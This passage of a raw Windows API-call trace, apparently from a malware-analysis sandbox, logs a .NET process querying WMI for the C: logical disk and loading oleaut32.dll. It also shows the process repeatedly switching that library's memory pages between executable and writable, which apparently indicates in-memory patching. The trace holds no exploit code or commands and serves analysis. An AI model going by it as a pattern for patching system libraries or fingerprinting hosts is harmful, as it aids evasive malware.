ppvObject=0x6ecc50 | out: ppvObject=0x6ecc50*=0xb5a8cc) returned 0x0 [0092.729] WbemLocator:IRpcOptions:Query (in: This=0xb5a8cc, pPrx=0xb5a8e4, dwProperty=2, pdwValue=0x6ecc78 | out: pdwValue=0x6ecc78) returned 0x80004002 [0092.729] WbemLocator:IUnknown:Release (This=0xb5a8cc) returned 0x3 [0092.729] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0092.729] CoGetContextToken (in: pToken=0x6ed198 | out: pToken=0x6ed198) returned 0x0 [0092.729] CoGetContextToken (in: pToken=0x6ed0f8 | out: pToken=0x6ed0f8) returned 0x0 [0092.729] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x6ed1c8*(Data1=0x9556dc99, Data2=0x828c, Data3=0x11cf, Data4=([0]=0xa3, [1]=0x7e, [2]=0x0, [3]=0xaa, [4]=0x0, [5]=0x32, [6]=0x40, [7]=0xc7)), ppvObject=0x6ed1c4 | out: ppvObject=0x6ed1c4*=0x601d544) returned 0x0 [0092.729] WbemLocator:IUnknown:AddRef (This=0x601d544) returned 0x4 [0092.729] WbemLocator:IUnknown:Release (This=0x601d544) returned 0x3 [0092.729] WbemLocator:IUnknown:Release (This=0x601d544) returned 0x2 [0092.732] SysReAllocStringLen (in: pbstr=0x6ec8dc*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x6ec8dc*="oleaut32.dll") returned 1 [0092.732] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0092.732] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.Net\\assembly\\GAC_32\\mscorlib\\v4.0_4.0.0.0__b77a5c561934e089\\oleaut32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0092.736] GetLastError () returned 0x7e [0092.737] SetLastError (dwErrCode=0x7e) [0092.741] SysReAllocStringLen (in: pbstr=0x6ec8dc*=0x0, psz="oleaut32.dll", len=0xc | out: pbstr=0x6ec8dc*="oleaut32.dll") returned 1 [0092.741] CharLowerBuffW (in: lpsz="oleaut32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0092.741] LoadLibraryExW (lpLibFileName="oleaut32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0092.741] GetLastError () returned 0x0 [0092.741] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41238, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.741] GetCurrentProcess () returned 0xffffffff [0092.741] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41238, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.742] GetCurrentProcess () returned 0xffffffff [0092.742] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41258, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.742] GetCurrentProcess () returned 0xffffffff [0092.742] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41258, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.742] GetCurrentProcess () returned 0xffffffff [0092.742] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41260, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.742] GetCurrentProcess () returned 0xffffffff [0092.742] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41260, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.742] GetCurrentProcess () returned 0xffffffff [0092.742] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41268, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.743] GetCurrentProcess () returned 0xffffffff [0092.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41268, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.743] GetCurrentProcess () returned 0xffffffff [0092.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e412c4, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.743] GetCurrentProcess () returned 0xffffffff [0092.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e412c4, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.743] GetCurrentProcess () returned 0xffffffff [0092.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e412cc, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.743] GetCurrentProcess () returned 0xffffffff [0092.743] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e412cc, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.744] GetCurrentProcess () returned 0xffffffff [0092.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41300, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.744] GetCurrentProcess () returned 0xffffffff [0092.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41300, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.744] GetCurrentProcess () returned 0xffffffff [0092.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41308, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.744] GetCurrentProcess () returned 0xffffffff [0092.744] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41308, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.745] GetCurrentProcess () returned 0xffffffff [0092.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e4132c, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.745] GetCurrentProcess () returned 0xffffffff [0092.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e4132c, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.745] GetCurrentProcess () returned 0xffffffff [0092.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41390, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x4, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x20) returned 0x0 [0092.745] GetCurrentProcess () returned 0xffffffff [0092.745] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ec8c4*=0x76e41390, NumberOfBytesToProtect=0x6ec8c8, NewAccessProtection=0x20, OldAccessProtection=0x6ec8fc | out: BaseAddress=0x6ec8c4*=0x76e41000, NumberOfBytesToProtect=0x6ec8c8, OldAccessProtection=0x6ec8fc*=0x4) returned 0x0 [0092.746] GetProcAddress (hModule=0x76e40000, lpProcName="SysStringLen") returned 0x76e44680 [0092.746] SysStringLen (param_1=0x0) returned 0x0 [0092.748] GetProcAddress (hModule=0x76d30000, lpProcName="RtlZeroMemory") returned 0x77ca3c10 [0092.749] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010820, puCount=0x6ed55c | out: puCount=0x6ed55c*=0x0) returned 0x0 [0092.749] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed558*=0x0, pszText=0x0 | out: puBuffLength=0x6ed558*=0x20, pszText=0x0) returned 0x0 [0092.749] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed558*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ed558*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0092.749] CoGetContextToken (in: pToken=0x6ed1c8 | out: pToken=0x6ed1c8) returned 0x0 [0092.749] WbemLocator:IUnknown:AddRef (This=0xb5a8e4) returned 0x3 [0092.749] WbemLocator:IUnknown:QueryInterface (in: This=0xb5a8e4, riid=0x74a1e814*(Data1=0x0, Data2=0x0, Data3=0x0, Data4=([0]=0xc0, [1]=0x0, [2]=0x0, [3]=0x0, [4]=0x0, [5]=0x0, [6]=0x0, [7]=0x46)), ppvObject=0x6ed05c | out: ppvObject=0x6ed05c*=0xb5a8e4) returned 0x0 [0092.749] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x3 [0092.749] WbemLocator:IUnknown:Release (This=0xb5a8e4) returned 0x2 [0092.749] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed560*=0x0, pszText=0x0 | out: puBuffLength=0x6ed560*=0x20, pszText=0x0) returned 0x0 [0092.749] WbemDefPath:IWbemPath:GetText (in: This=0x6010820, lFlags=2, puBuffLength=0x6ed560*=0x20, pszText="0000000000000000000000000000000" | out: puBuffLength=0x6ed560*=0x20, pszText="win32_logicaldisk.deviceid=\"C:\"") returned 0x0 [0092.781] IWbemServices:GetObject (in: This=0x601d544, strObjectPath="win32_logicaldisk.deviceid=\"C:\"", lFlags=0, pCtx=0x0, ppObject=0x6ed514*=0x0, ppCallResult=0x0 | out: ppObject=0x6ed514*=0x601efb0, ppCallResult=0x0) returned 0x0 [0092.781] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=12, lpWideCharStr=0x6ebeb4, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll센nọ矋손n뻴n矆뼜n뻸n矆ޠ") returned 12 [0092.781] SysReAllocStringLen (in: pbstr=0x6eceb8*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x6eceb8*="OLEAUT32.dll") returned 1 [0092.781] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0092.781] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0092.782] GetLastError () returned 0x0 [0092.782] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41238, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.782] GetCurrentProcess () returned 0xffffffff [0092.782] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41238, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.782] GetCurrentProcess () returned 0xffffffff [0092.782] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41258, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.783] GetCurrentProcess () returned 0xffffffff [0092.783] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41258, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.783] GetCurrentProcess () returned 0xffffffff [0092.783] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41260, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.783] GetCurrentProcess () returned 0xffffffff [0092.783] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41260, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.784] GetCurrentProcess () returned 0xffffffff [0092.784] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41268, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.784] GetCurrentProcess () returned 0xffffffff [0092.784] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41268, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.784] GetCurrentProcess () returned 0xffffffff [0092.784] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e412c4, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.784] GetCurrentProcess () returned 0xffffffff [0092.784] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e412c4, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.785] GetCurrentProcess () returned 0xffffffff [0092.785] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e412cc, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.785] GetCurrentProcess () returned 0xffffffff [0092.785] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e412cc, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.785] GetCurrentProcess () returned 0xffffffff [0092.785] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41300, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.785] GetCurrentProcess () returned 0xffffffff [0092.785] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41300, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.785] GetCurrentProcess () returned 0xffffffff [0092.785] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41308, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.786] GetCurrentProcess () returned 0xffffffff [0092.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41308, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.786] GetCurrentProcess () returned 0xffffffff [0092.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e4132c, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.786] GetCurrentProcess () returned 0xffffffff [0092.786] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e4132c, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.787] GetCurrentProcess () returned 0xffffffff [0092.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41390, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x4, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x20) returned 0x0 [0092.787] GetCurrentProcess () returned 0xffffffff [0092.787] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ecea4*=0x76e41390, NumberOfBytesToProtect=0x6ecea8, NewAccessProtection=0x20, OldAccessProtection=0x6ecedc | out: BaseAddress=0x6ecea4*=0x76e41000, NumberOfBytesToProtect=0x6ecea8, OldAccessProtection=0x6ecedc*=0x4) returned 0x0 [0092.788] GetProcAddress (hModule=0x76e40000, lpProcName=0x11b) returned 0x76e473fd [0092.788] GetProcAddress (hModule=0x76e40000, lpProcName=0x11c) returned 0x76e4742e [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] ResetEvent (hEvent=0xb8) returned 1 [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] ResetEvent (hEvent=0xb8) returned 1 [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] GetCurrentThreadId () returned 0xb0c [0092.862] SetEvent (hEvent=0xbc) returned 1 [0092.862] SetEvent (hEvent=0xb8) returned 1 [0092.862] CloseHandle (hObject=0x2d4) returned 1 [0092.865] GetProcAddress (hModule=0x76d30000, lpProcName="RegOpenKeyExW") returned 0x76d42311 [0092.866] WbemDefPath:IWbemPath:GetNamespaceCount (in: This=0x6010ba0, puCount=0x6ed514 | out: puCount=0x6ed514*=0x2) returned 0x0 [0092.866] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=4, puBuffLength=0x6ed510*=0x0, pszText=0x0 | out: puBuffLength=0x6ed510*=0xf, pszText=0x0) returned 0x0 [0092.866] WbemDefPath:IWbemPath:GetText (in: This=0x6010ba0, lFlags=4, puBuffLength=0x6ed510*=0xf, pszText="00000000000000" | out: puBuffLength=0x6ed510*=0xf, pszText="\\\\.\\root\\cimv2") returned 0x0 [0092.867] SysReAllocStringLen (in: pbstr=0x6ecd68*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x6ecd68*="OLEAUT32.dll") returned 1 [0092.867] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0092.867] LoadLibraryExW (lpLibFileName="C:\\Windows\\Microsoft.NET\\Framework\\v4.0.30319\\OLEAUT32.dll", hFile=0x0, dwFlags=0x8) returned 0x0 [0092.867] GetLastError () returned 0x7e [0092.867] SetLastError (dwErrCode=0x7e) [0092.867] MultiByteToWideChar (in: CodePage=0x3, dwFlags=0x0, lpMultiByteStr=0x22c1ad4, cbMultiByte=12, lpWideCharStr=0x6ec244, cchWideChar=2047 | out: lpWideCharStr="OLEAUT32.dll\x01") returned 12 [0092.868] SysReAllocStringLen (in: pbstr=0x6ed248*=0x0, psz="OLEAUT32.dll", len=0xc | out: pbstr=0x6ed248*="OLEAUT32.dll") returned 1 [0092.868] CharLowerBuffW (in: lpsz="OLEAUT32.dll", cchLength=0xc | out: lpsz="oleaut32.dll") returned 0xc [0092.868] LoadLibraryExA (lpLibFileName="OLEAUT32.dll", hFile=0x0, dwFlags=0x0) returned 0x76e40000 [0092.868] GetLastError () returned 0x0 [0092.868] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41238, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.868] GetCurrentProcess () returned 0xffffffff [0092.868] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41238, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.869] GetCurrentProcess () returned 0xffffffff [0092.869] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41258, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.869] GetCurrentProcess () returned 0xffffffff [0092.869] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41258, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.869] GetCurrentProcess () returned 0xffffffff [0092.869] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41260, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.869] GetCurrentProcess () returned 0xffffffff [0092.869] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41260, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.869] GetCurrentProcess () returned 0xffffffff [0092.869] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41268, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.870] GetCurrentProcess () returned 0xffffffff [0092.870] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e41268, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.870] GetCurrentProcess () returned 0xffffffff [0092.870] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e412c4, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.870] GetCurrentProcess () returned 0xffffffff [0092.870] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e412c4, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x20, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x4) returned 0x0 [0092.870] GetCurrentProcess () returned 0xffffffff [0092.870] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e412cc, NumberOfBytesToProtect=0x6ed238, NewAccessProtection=0x4, OldAccessProtection=0x6ed26c | out: BaseAddress=0x6ed234*=0x76e41000, NumberOfBytesToProtect=0x6ed238, OldAccessProtection=0x6ed26c*=0x20) returned 0x0 [0092.870] GetCurrentProcess () returned 0xffffffff [0092.870] NtProtectVirtualMemory (in: ProcessHandle=0xffffffff, BaseAddress=0x6ed234*=0x76e412cc, 